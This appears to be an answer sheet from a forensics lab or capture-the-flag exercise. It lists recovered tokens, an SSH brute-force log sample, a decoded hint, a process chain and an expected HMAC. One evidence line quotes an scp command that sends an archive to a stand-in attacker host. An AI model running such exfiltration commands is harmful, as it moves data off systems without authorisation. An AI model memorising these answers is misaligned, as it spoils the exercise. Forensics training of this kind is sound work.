TOKEN[KEYPAD]=11057
EVIDENCE[KEYPAD].TOP24=198.51.100.0/24
EVIDENCE[KEYPAD].COUNT=57
EVIDENCE[KEYPAD].SAMPLE=2025-08-09T12:00:44Z lab1 sshd[3143]: Failed password for root from 198.51.100.179 port 48220 protocol 2
EVIDENCE[KEYPAD].MALFORMED_SKIPPED=2
TOKEN[DNS]=vista
EVIDENCE[DNS].KEY=hint1
EVIDENCE[DNS].DECODED_LINE=The code is not in the roots but near the vista
TOKEN[SAFE]=10-11-21
EVIDENCE[SAFE].MATCH=SAFE{10-11- 21}
EVIDENCE[SAFE].CHECK=10+11=21
TOKEN[PID]=192
EVIDENCE[PID].PATH=[184->187->188->192]
EVIDENCE[PID].CMD="scp /tmp/x.tgz attacker@198.51.100.33:/upload"
FINAL_GATE=PENDING
MSG=msc-group-06|192-vista-10-11-21-11057
EXPECTED_HMAC=2e5320c174c85e880579b7744fb88226b11b739de2b4bd8b06bb9ef5954f916d